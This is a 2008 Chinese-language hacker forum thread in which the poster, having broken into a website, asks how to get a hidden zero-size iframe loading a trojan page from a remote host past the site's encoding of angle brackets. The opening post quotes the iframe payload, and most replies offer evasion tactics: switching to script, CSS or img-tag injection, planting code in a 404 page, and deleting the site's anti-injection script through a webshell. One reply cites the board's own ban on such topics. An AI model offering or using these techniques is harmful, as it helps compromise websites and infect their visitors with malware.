Board logo

标题: [讨论]挂马时碰到的问题...... [打印本页]

作者: 虚竹    时间: 2008-7-20 23:16     标题: [讨论]挂马时碰到的问题......

[讨论]挂马时碰到的问题......
日到一站...挂马成功

<iframe width=0 height=0 src=http://www.xxx.com/m.htm></iframe>


挂上后查看源文件 被过滤成了..

&#60;iframe width=0 height=0 src=http://www.xxx.com/m.htm&#62;&#60;/iframe&#62



<>  这2个符号被过滤.... 各位牛提供下解决办法...
作者: 东莞大岭山    时间: 2008-7-20 23:16


即使不过滤掉,中马的机率有多少?现在大多都打了补丁了?你的马能穿SP2不能?能的话发出来分享下
作者: 路上不塞车    时间: 2008-7-20 23:16

我很菜,只能给你点建议。
1:你去看看他网页中用到<>的地方怎么设置的,网页中应该有的吧。。<body>...........</body>等等,他怎么写的你也怎么写。。。
2:用CSS自定义样式。。把它那个给改了。具体你可以去看看CSS的东东。。有两篇文章很经典你可以去看看。《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》,《二行代码解决全部网页木马(含iframe/script木马)》,还有vbs小铺的那个《关于<<二行代码解决全部网页木马>>的文章》。
帖子33 精华0 积分48 阅读权限40 性别男 在线时间32 小时 注册时间2007-8-13 最后登录2008-4-24 查看详细资料引用 报告 回复 TOP 软件项目外包

唐不狐
很黃很暴力

晶莹剔透§烈日灼然
作者: bimuyu    时间: 2008-7-20 23:16

换一种挂马方式
如script 调用js挂,css挂马等。
如果有系统权限,弄个404挂马很不错的。
帖子145 精华2 积分574 阅读权限50 性别男 来自china 在线时间106 小时 注册时间2005-9-27 最后登录2008-7-9 查看个人网站
查看详细资料引用 报告 回复 TOP

jacksatan
晶莹剔透§烈日灼然
作者: 铁忠    时间: 2008-7-20 23:16

用js就可以了 现在挂马常用都是js 框架 淘汰了
帖子19 精华0 积分19 阅读权限40 在线时间9 小时 注册时间2008-3-29 最后登录2008-6-21 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

fatcat
晶莹剔透§烈日灼然
作者: marco    时间: 2008-7-20 23:16

受不了。一个个答非所问,明显过滤了"<"了,难道JS挂马就不用这个"<"了吗!楼主可以用img标签。
再说现在没有好网马的话就不用挂了,老是那些垃圾马没什么意思,中不了还被别人骂,有什么意思哦,呵呵晕啊晕
帖子45 精华0 积分145 阅读权限40 性别男 来自浙江 在线时间68 小时 注册时间2004-11-9 最后登录2008-7-2 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

cwa
cwa

晶莹剔透§烈日灼然
作者: 土人    时间: 2008-7-20 23:16


本版规则
给议题提出者:
01 本版的原创议题禁止讨论页面挂马、收信刷库、偷盗隐私、软绑架等明显违反法律和社会道德的话题。
作者: 老游子    时间: 2008-7-20 23:16

..我晕..难道JS挂马就不用<>了么??  ..我汗..看清楚题目在回答啊..OK?﹎.别拿天与地d\\'对立〆衡量你们与我的距离﹎.ˊ 传说中的blog:http://www.5213389.com

帖子109 精华0 积分3057 阅读权限100 性别男 来自辽宁沈阳 在线时间108 小时 注册时间2006-5-8 最后登录2008-6-16 查看个人网站
查看详细资料引用 报告 回复 TOP

1234506
晶莹剔透§烈日灼然
作者: pat1110    时间: 2008-7-20 23:16

你这是XSS 还是直接修改原文件挂马啊?

XSS的话  就只能看看他标签地方 能不能利用了  不然没办法
直接改原文件的话  这种情况没见过~~~
帖子7 精华0 积分9 阅读权限40 在线时间13 小时 注册时间2005-7-20 最后登录2008-5-20 查看详细资料引用 报告 回复 TOP

绝情啊东
荣誉会员

作者: 彬彬    时间: 2008-7-20 23:16

不是XSS................﹎.别拿天与地d\\'对立〆衡量你们与我的距离﹎.ˊ 传说中的blog:http://www.5213389.com

帖子109 精华0 积分3057 阅读权限100 性别男 来自辽宁沈阳 在线时间108 小时 注册时间2006-5-8 最后登录2008-6-16 查看个人网站
查看详细资料引用 报告 回复 TOP

1234506
晶莹剔透§烈日灼然
作者: lookyes    时间: 2008-7-20 23:16

你在本地上传个带<iframe>的文件试下  看他过滤了没

要是没过滤把他首页代码下下来  在本地改完了 在传上去试下
帖子7 精华0 积分9 阅读权限40 在线时间13 小时 注册时间2005-7-20 最后登录2008-5-20 查看详细资料引用 报告 回复 TOP

逍遥乾坤
晶莹剔透§烈日灼然
作者: szyuewei    时间: 2008-7-20 23:16

貌似所有的网页中都要用到:<>符号吧。
你看你挂马页面中其它语句是怎么编写的,你就按照它的格式来,应该就没有问题了!
如果还不行,可能是它调用了某个“防挂”脚本,你既然已经有webshell了,那就找到那个脚本,删除掉.就ok了!
再者,如果嫌上面两种办法麻烦,就直接改别的挂马方式,比如前面人提到的js等等!

     ...................加我的QQ!

帖子6 精华0 积分13 阅读权限40 在线时间18 小时 注册时间2005-12-13 最后登录2008-5-25 查看详细资料引用 报告 回复 TOP

simpleboy
晶莹剔透§烈日灼然
作者: weimei    时间: 2008-7-20 23:16

用这个script  标签试试吧只做安静的观众
帖子72 精华2 积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2 查看详细资料引用 报告 回复 TOP

poc
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2